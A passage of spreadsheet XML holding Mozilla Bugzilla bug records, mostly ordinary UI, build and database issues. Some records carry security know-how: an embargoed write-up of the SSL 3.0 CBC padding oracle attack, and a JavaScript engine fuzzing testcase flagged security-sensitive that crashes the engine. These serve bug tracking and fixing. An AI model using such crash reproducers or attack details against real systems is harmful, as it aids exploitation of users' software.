      <c r="J6000" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6000" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6000" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6000" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6000" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6000" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6000" t="inlineStr"/>
      <c r="Q6000" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6000" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6000" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6000" t="n">
        <v>1</v>
      </c>
      <c r="U6000" t="n">
        <v>0</v>
      </c>
      <c r="V6000" t="n">
        <v>5</v>
      </c>
      <c r="W6000" t="inlineStr">
        <is>
          <t>It turns out that bootstrap tooltips (which we want for bug 1170301) don't work with older versions. Let's upgrade.</t>
        </is>
      </c>
      <c r="X6000" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6001">
      <c r="A6001" t="n">
        <v>1367921</v>
      </c>
      <c r="B6001" t="inlineStr">
        <is>
          <t>2017-05-25 15:50:30 -0700</t>
        </is>
      </c>
      <c r="C6001" t="inlineStr">
        <is>
          <t>Change label text in Page Action Menu &gt; Send to Device when user isn't signed in and update sync icon</t>
        </is>
      </c>
      <c r="D6001" t="inlineStr">
        <is>
          <t>2017-08-28 13:08:07 -0700</t>
        </is>
      </c>
      <c r="E6001" t="n">
        <v>1</v>
      </c>
      <c r="F6001" t="n">
        <v>1</v>
      </c>
      <c r="G6001" t="n">
        <v>2</v>
      </c>
      <c r="H6001" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6001" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6001" t="inlineStr">
        <is>
          <t>Menus</t>
        </is>
      </c>
      <c r="K6001" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6001" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6001" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6001" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6001" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6001" t="inlineStr">
        <is>
          <t>[reserve-photon-structure][photon-l10n-risk]</t>
        </is>
      </c>
      <c r="Q6001" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6001" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6001" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T6001" t="n">
        <v>1</v>
      </c>
      <c r="U6001" t="n">
        <v>0</v>
      </c>
      <c r="V6001" t="n">
        <v>19</v>
      </c>
      <c r="W6001" t="inlineStr">
        <is>
          <t>Currently the label reads: Firefox Account (with an old sync icon)
Update to read: Sign in to Sync (with new icon shown in spec)
This change is to maintain parity with messaging used elsewhere. 
Updated spec: https://mozilla.invisionapp.com/share/KZBRDI1EU#/234257205_Action_Menu_-_Send_To_Device</t>
        </is>
      </c>
      <c r="X6001" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6002">
      <c r="A6002" t="n">
        <v>444949</v>
      </c>
      <c r="B6002" t="inlineStr">
        <is>
          <t>2008-07-12 15:17:02 -0700</t>
        </is>
      </c>
      <c r="C6002" t="inlineStr">
        <is>
          <t>bm-xserve07 has fts_read problem</t>
        </is>
      </c>
      <c r="D6002" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6002" t="n">
        <v>1</v>
      </c>
      <c r="F6002" t="n">
        <v>1</v>
      </c>
      <c r="G6002" t="n">
        <v>5</v>
      </c>
      <c r="H6002" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6002" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6002" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6002" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6002" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M6002" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6002" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6002" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6002" t="inlineStr"/>
      <c r="Q6002" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6002" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6002" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6002" t="n">
        <v>1</v>
      </c>
      <c r="U6002" t="n">
        <v>0</v>
      </c>
      <c r="V6002" t="n">
        <v>26</v>
      </c>
      <c r="W6002" t="inlineStr">
        <is>
          <t>I was fixing Bug 443397, in which, I updated tinderbox's code and tried to start again.
For several cycles, it seems that two instances of tinderbox were running at the same time.
I stopped all instances and decided to remove obj dir and source dir but there is one folder that cannot be deleted. There might be some type of corruption
Command runned: rm -rf /builds/tinderbox/Tb-Trunk/Darwin_8.8.4_Depend/build/universal/i386/dist/include/dom
It returns this:
rm(315) malloc: *** vm_allocate(size=1069056) failed (error code=3)
rm(315) malloc: *** error: can't allocate region
rm(315) malloc: *** set a breakpoint in szone_error to debug
rm: fts_read: Cannot allocate memory</t>
        </is>
      </c>
      <c r="X6002" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6003">
      <c r="A6003" t="n">
        <v>17156</v>
      </c>
      <c r="B6003" t="inlineStr">
        <is>
          <t>1999-10-24 17:21:50 -0700</t>
        </is>
      </c>
      <c r="C6003" t="inlineStr">
        <is>
          <t>Need to say bug.moz.org is for 5.x only.</t>
        </is>
      </c>
      <c r="D6003" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E6003" t="n">
        <v>1</v>
      </c>
      <c r="F6003" t="n">
        <v>1</v>
      </c>
      <c r="G6003" t="n">
        <v>4</v>
      </c>
      <c r="H6003" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6003" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6003" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6003" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6003" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6003" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6003" t="inlineStr"/>
      <c r="Q6003" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6003" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6003" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T6003" t="n">
        <v>1</v>
      </c>
      <c r="U6003" t="n">
        <v>0</v>
      </c>
      <c r="V6003" t="n">
        <v>9</v>
      </c>
      <c r="W6003" t="inlineStr">
        <is>
          <t>There are too many people getting here that don't know it's not for 4.x.  It
would be good if the opening page (and possibly enter bug page), specified that.</t>
        </is>
      </c>
      <c r="X6003" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6004">
      <c r="A6004" t="n">
        <v>509839</v>
      </c>
      <c r="B6004" t="inlineStr">
        <is>
          <t>2009-08-11 15:35:56 -0700</t>
        </is>
      </c>
      <c r="C6004" t="inlineStr">
        <is>
          <t>Crash [@ nsViewManager::CreateView][@ nsCSSFrameConstructor::AddFrameConstructionItemsInternal] on closing print preview with -moz-transform, position: fixed table displays</t>
        </is>
      </c>
      <c r="D6004" t="inlineStr">
        <is>
          <t>2013-05-18 18:15:13 -0700</t>
        </is>
      </c>
      <c r="E6004" t="n">
        <v>1</v>
      </c>
      <c r="F6004" t="n">
        <v>1</v>
      </c>
      <c r="G6004" t="n">
        <v>3</v>
      </c>
      <c r="H6004" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6004" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6004" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6004" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6004" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6004" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6004" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6004" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6004" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q6004" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6004" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6004" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T6004" t="n">
        <v>1</v>
      </c>
      <c r="U6004" t="n">
        <v>0</v>
      </c>
      <c r="V6004" t="n">
        <v>33</v>
      </c>
      <c r="W6004" t="inlineStr">
        <is>
          <t>Created attachment 393908
testcase
See testcase, which crashes current trunk build when closing the print preview window.
http://crash-stats.mozilla.com/report/index/6009c81f-304b-4c1d-90e9-a8d5a2090811?p=1
0  	kernel32.dll  	kernel32.dll@0x12afb  	
1 	mozcrt19.dll 	_CxxThrowException 	throw.cpp:159
2 	mozcrt19.dll 	operator new 	obj-firefox/memory/jemalloc/crtsrc/new.cpp:57
3 	xul.dll 	nsViewManager::CreateView 	view/src/nsViewManager.cpp:276
4 	xul.dll 	nsBoxFrame::CacheAttributes 	layout/xul/base/src/nsBoxFrame.cpp:287
5 	xul.dll 	nsMenuPopupFrame::Init 	layout/xul/base/src/nsMenuPopupFrame.cpp:147
http://crash-stats.mozilla.com/report/index/31a95af1-31e4-415d-8ea6-96d662090811?p=1
0  	kernel32.dll  	kernel32.dll@0x12afb  	
1 	mozcrt19.dll 	_CxxThrowException 	throw.cpp:159
2 	mozcrt19.dll 	operator new 	obj-firefox/memory/jemalloc/crtsrc/new.cpp:57
3 	xul.dll 	nsCSSFrameConstructor::AddFrameConstructionItemsInternal 	layout/base/nsCSSFrameConstructor.cpp:5338
4 	xul.dll 	nsCSSFrameConstructor::ProcessChildren 	layout/base/nsCSSFrameConstructor.cpp:9579
5 	xul.dll 	nsCSSFrameConstructor::ConstructFrameFromItemInternal 	layout/base/nsCSSFrameConstructor.cpp:3927
6 	xul.dll 	nsCSSFrameConstructor::ConstructFramesFromItem 	layout/base/nsCSSFrameConstructor.cpp:5531
7 	xul.dll 	nsCSSFrameConstructor::ProcessChildren 	layout/base/nsCSSFrameConstructor.cpp:9592
8 	xul.dll 	nsCSSFrameConstructor::ConstructFrameFromItemInternal 	layout/base/nsCSSFrameConstructor.cpp:3927
9 	xul.dll 	nsCSSFrameConstructor::ConstructFramesFromItem 	layout/base/nsCSSFrameConstructor.cpp:5531
10 	xul.dll 	nsCSSFrameConstructor::ProcessChildren 	layout/base/nsCSSFrameConstructor.cpp:9592
etc...</t>
        </is>
      </c>
      <c r="X6004" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6005">
      <c r="A6005" t="n">
        <v>1076983</v>
      </c>
      <c r="B6005" t="inlineStr">
        <is>
          <t>2014-10-02 10:20:56 -0700</t>
        </is>
      </c>
      <c r="C6005" t="inlineStr">
        <is>
          <t>Padding oracle attack on SSL 3.0</t>
        </is>
      </c>
      <c r="D6005" t="inlineStr">
        <is>
          <t>2021-09-15 22:24:51 -0700</t>
        </is>
      </c>
      <c r="E6005" t="n">
        <v>1</v>
      </c>
      <c r="F6005" t="n">
        <v>1</v>
      </c>
      <c r="G6005" t="n">
        <v>3</v>
      </c>
      <c r="H6005" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6005" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6005" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K6005" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6005" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6005" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6005" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6005" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6005" t="inlineStr">
        <is>
          <t>[adv-main34-][adv-esr31.3-]</t>
        </is>
      </c>
      <c r="Q6005" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6005" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6005" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T6005" t="n">
        <v>1</v>
      </c>
      <c r="U6005" t="n">
        <v>0</v>
      </c>
      <c r="V6005" t="n">
        <v>94</v>
      </c>
      <c r="W6005" t="inlineStr">
        <is>
          <t>***** IMPORTANT: This information is under embargo until 2014-10-16.  This MUST NOT be talked about before that time, except on a need-to-know basis.
Google security have contacted us about a flaw in the CBC modes of SSL 3.0 that enables a BEAST-like attack.
There is no mitigation for this attack other than to avoid negotiating CBC ciphers in SSL 3.0.  Disabling SSL 3.0 might not be a good idea. Google have suggested that we instead enable the downgrade protection mechanisms defined in draft-ietf-tls-downgrade-scsv.
Downgrade protection has already been implemented in  with bug 1036737 and bug 1072382.  All that work is being done in public.  But it's only recent.  The only unusual actions we would need to do is consider uplift into appropriate channels, which includes an NSS bump.
There's a real question however whether this is sufficient to protect anyone other than Google.  Support for this feature in server software is very difficult, since only the latest version of NSS supports this.  OpenSSL does not include support for the feature as far as I can tell.
In addition to the downgrade protection, we might also consider changing the set of cipher suites we offer when we downgrade to SSL 3.0 to avoid CBC modes.  That basically reduces the available suites to RC4, which is pretty badly busted.  The brokenness of RC4 is the reason that Google are recommending we use the downgrade SCSV mechanism instead.  However, given that this new attack requires in the order of 2^7 sessions per byte, and best guesses at RC4 attacks are in the order of 2^23 sessions, that still seems like a reasonable course of action.</t>
        </is>
      </c>
      <c r="X6005" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6006">
      <c r="A6006" t="n">
        <v>15973</v>
      </c>
      <c r="B6006" t="inlineStr">
        <is>
          <t>1999-10-10 00:10:38 -0700</t>
        </is>
      </c>
      <c r="C6006" t="inlineStr">
        <is>
          <t>Keep Roadmap uptodate</t>
        </is>
      </c>
      <c r="D6006" t="inlineStr">
        <is>
          <t>2003-03-28 07:32:05 -0800</t>
        </is>
      </c>
      <c r="E6006" t="n">
        <v>1</v>
      </c>
      <c r="F6006" t="n">
        <v>1</v>
      </c>
      <c r="G6006" t="n">
        <v>5</v>
      </c>
      <c r="H6006" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6006" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J6006" t="inlineStr">
        <is>
          <t>Miscellaneous</t>
        </is>
      </c>
      <c r="K6006" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6006" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6006" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N6006" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6006" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6006" t="inlineStr"/>
      <c r="Q6006" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6006" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6006" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6006" t="n">
        <v>1</v>
      </c>
      <c r="U6006" t="n">
        <v>0</v>
      </c>
      <c r="V6006" t="n">
        <v>13</v>
      </c>
      <c r="W6006" t="inlineStr">
        <is>
          <t>As I know the term "roadmap", it means the top level future timeline.
I'd include some information like on
http://www.mozilla.org/projects/seamonkey/milestones/index.html (but
reorganized).</t>
        </is>
      </c>
      <c r="X6006" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6007">
      <c r="A6007" t="n">
        <v>1066248</v>
      </c>
      <c r="B6007" t="inlineStr">
        <is>
          <t>2014-09-11 12:15:39 -0700</t>
        </is>
      </c>
      <c r="C6007" t="inlineStr">
        <is>
          <t>Show "[0]" in the title when there are no failures in the current view</t>
        </is>
      </c>
      <c r="D6007" t="inlineStr">
        <is>
          <t>2015-05-20 04:27:13 -0700</t>
        </is>
      </c>
      <c r="E6007" t="n">
        <v>1</v>
      </c>
      <c r="F6007" t="n">
        <v>1</v>
      </c>
      <c r="G6007" t="n">
        <v>7</v>
      </c>
      <c r="H6007" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6007" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6007" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6007" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6007" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6007" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6007" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6007" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6007" t="inlineStr"/>
      <c r="Q6007" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6007" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6007" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6007" t="n">
        <v>1</v>
      </c>
      <c r="U6007" t="n">
        <v>0</v>
      </c>
      <c r="V6007" t="n">
        <v>6</v>
      </c>
      <c r="W6007" t="inlineStr">
        <is>
          <t>I just did a Try push, and I'm looking at it in both TBPL [1] and Treeherder [2].
In TBPL, the page title is "[0] Bug 1065008 - Consider the shadow transform when computing the opaq... - Try - TBPL".
In Treeherder, the page title is "try".
The "[0]" in the TBPL title is the number of non-starred problems. Having this in the title bar allows me to keep an eye on how the Try push is going without having the tab active.
Treeherder should include this number in the title too, as well as match the TBPL title's informativeness in other ways (e.g. showing "Bug 1065008 - Consider..." instead of "try").
[1] https://tbpl.mozilla.org/?tree=Try&amp;rev=941628a8b5cb
[2] https://treeherder.mozilla.org/ui/#/jobs?repo=try&amp;revision=941628a8b5cb</t>
        </is>
      </c>
      <c r="X6007" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6008">
      <c r="A6008" t="n">
        <v>1534902</v>
      </c>
      <c r="B6008" t="inlineStr">
        <is>
          <t>2019-03-13 00:25:32 -0700</t>
        </is>
      </c>
      <c r="C6008" t="inlineStr">
        <is>
          <t>Assertion failure: !JS_IsDeadWrapper(origTarget) (We don't want a dead proxy in the wrapper map), at js/src/proxy/CrossCompartmentWrapper.cpp:549</t>
        </is>
      </c>
      <c r="D6008" t="inlineStr">
        <is>
          <t>2019-04-09 12:15:26 -0700</t>
        </is>
      </c>
      <c r="E6008" t="n">
        <v>1</v>
      </c>
      <c r="F6008" t="n">
        <v>1</v>
      </c>
      <c r="G6008" t="n">
        <v>3</v>
      </c>
      <c r="H6008" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6008" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6008" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6008" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6008" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6008" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6008" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6008" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6008" t="inlineStr">
        <is>
          <t>[jsbugmon:]</t>
        </is>
      </c>
      <c r="Q6008" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6008" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6008" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T6008" t="n">
        <v>1</v>
      </c>
      <c r="U6008" t="n">
        <v>0</v>
      </c>
      <c r="V6008" t="n">
        <v>10</v>
      </c>
      <c r="W6008" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 9067457d7dcf (build with --enable-debug, run with --fuzzing-safe --no-threads --no-baseline --no-ion --more-compartments):
    // Adapted from randomly chosen test: js/src/jit-test/tests/realms/nuking.js
    evalcx("var x = newGlobal({ sameCompartmentAs: newGlobal({ newCompartment: true }) });" +
           'x.evaluate("(" + function () { nukeAllCCWs(); } + ")()"); x;',
        newGlobal()
    );
    // jsfunfuzz-generated
    recomputeWrappers();
Backtrace:
#0  js::RemapWrapper (cx=0x7f0d3ea17000, wobjArg=&lt;optimized out&gt;, newTargetArg=&lt;optimized out&gt;) at js/src/proxy/CrossCompartmentWrapper.cpp:548
#1  0x00005611229e4d41 in js::RecomputeWrappers (cx=0x7f0d3ea17000, sourceFilter=..., targetFilter=warning: RTTI symbol not found for class 'RecomputeWrappers(JSContext*, unsigned int, JS::Value*)::SingleOrAllCompartments'
...) at js/src/proxy/CrossCompartmentWrapper.cpp:676
#2  0x0000561122335478 in RecomputeWrappers (cx=0x7f0d3ea17000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6286
#3  0x00005611223d4285 in CallJSNative (cx=0x7f0d3ea17000, native=0x5611223352d0 &lt;RecomputeWrappers(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:442
/snip
For detailed crash information, see attachment.
Setting s-s as a start as this involves compartments.</t>
        </is>
      </c>
      <c r="X6008" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6009">
      <c r="A6009" t="n">
        <v>327348</v>
      </c>
      <c r="B6009" t="inlineStr">
        <is>
          <t>2006-02-15 12:54:43 -0800</t>
        </is>
      </c>
      <c r="C6009" t="inlineStr">
        <is>
          <t>Whining fails on MySQL 4.0 due to multiple date addition</t>
        </is>
      </c>
      <c r="D6009" t="inlineStr">
        <is>
          <t>2006-02-27 15:14:22 -0800</t>
        </is>
      </c>
      <c r="E6009" t="n">
        <v>1</v>
      </c>
      <c r="F6009" t="n">
        <v>1</v>
      </c>
      <c r="G6009" t="n">
        <v>4</v>
      </c>
      <c r="H6009" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6009" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6009" t="inlineStr">
        <is>
          <t>Whining</t>
        </is>
      </c>
      <c r="K6009" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L6009" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6009" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6009" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6009" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6009" t="inlineStr"/>
      <c r="Q6009" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6009" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6009" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T6009" t="n">
        <v>1</v>
      </c>
      <c r="U6009" t="n">
        <v>0</v>
      </c>
      <c r="V6009" t="n">
        <v>14</v>
      </c>
      <c r="W6009" t="inlineStr">
        <is>
          <t>In whine.pl, near line 185 (and other places), we have sql like the following:
"UPDATE whine_schedules " .
   "SET run_next = CURRENT_DATE + " .
        $dbh-&gt;sql_interval('?', 'DAY') . " + " .
        $dbh-&gt;sql_interval('?', 'HOUR') .
" WHERE id = ?"
When I run the whine script on MySQL 4.0.20, I get a syntax error from this statement.
It seems that MySQL doesn't like the addition of more than two dates in a single statement using standard arithmetic operators.  It probably wants us to use the Date and Time arithmetic functions instead.
For example, if I change it to the following, it works:
"UPDATE whine_schedules " .
   "SET run_next = DATE_ADD(CURRENT_DATE + " .
        $dbh-&gt;sql_interval('?', 'DAY') . ", " .
        $dbh-&gt;sql_interval('?', 'HOUR') . ") " . 
" WHERE id = ?"</t>
        </is>
      </c>
      <c r="X6009" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6010">
      <c r="A6010" t="n">
        <v>1426306</v>
      </c>
      <c r="B6010" t="inlineStr">
        <is>
          <t>2017-12-19 20:16:17 -0800</t>
        </is>
      </c>
      <c r="C6010" t="inlineStr">
        <is>
          <t>Firefox Desktop should store derived key material rather than the master key `kB`</t>
        </is>
      </c>
      <c r="D6010" t="inlineStr">
        <is>
          <t>2018-12-11 01:15:20 -0800</t>
        </is>
      </c>
      <c r="E6010" t="n">
        <v>1</v>
      </c>
      <c r="F6010" t="n">
        <v>1</v>
      </c>
      <c r="G6010" t="n">
        <v>2</v>
      </c>
      <c r="H6010" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6010" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6010" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K6010" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6010" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6010" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6010" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6010" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6010" t="inlineStr"/>
      <c r="Q6010" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6010" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6010" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T6010" t="n">
        <v>1</v>
      </c>
      <c r="U6010" t="n">
        <v>0</v>
      </c>
      <c r="V6010" t="n">
        <v>23</v>
      </c>
      <c r="W6010" t="inlineStr">
        <is>
          <t>This is the Desktop part of Bug 1426304.  Since we will soon start deriving non-sync-related keys from kB, sync clients should avoid storing kB directly, and instead store the minimal set of derived keys necessary to talk to sync:
* 64 bytes for the sync key bundle:
  kSync = HKDF(kB, undefined, "identity.mozilla.com/picl/v1/oldsync", 64)
* 16 bytes for the tokenserver's X-Client-State header:
  kXCS = SHA256(kB)[:16]
* 64 bytes for the webext chrome.storage.sync master key (which in restrospect, I wish we had derived from a root "sync" key rather than directly from kB...):
  kExtSync = HKDF(kB, undefined, "identity.mozilla.com/picl/v1/chrome.storage.sync", 64)</t>
        </is>
      </c>
      <c r="X6010" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6011">
      <c r="A6011" t="n">
        <v>1804640</v>
      </c>
      <c r="B6011" t="inlineStr">
        <is>
          <t>2022-12-08 02:20:17 -0800</t>
        </is>
      </c>
      <c r="C6011" t="inlineStr">
        <is>
          <t>Crash [@ sec_pkcs12_decoder_safe_bag_notify]</t>
        </is>
      </c>
      <c r="D6011" t="inlineStr">
        <is>
          <t>2023-10-17 20:37:09 -0700</t>
        </is>
      </c>
      <c r="E6011" t="n">
        <v>1</v>
      </c>
      <c r="F6011" t="n">
        <v>1</v>
      </c>
      <c r="G6011" t="n">
        <v>3</v>
      </c>
      <c r="H6011" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6011" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6011" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6011" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L6011" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6011" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6011" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6011" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6011" t="inlineStr">
        <is>
          <t>[adv-main110+][adv-esr102.8+] [post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6011" t="inlineStr">
        <is>
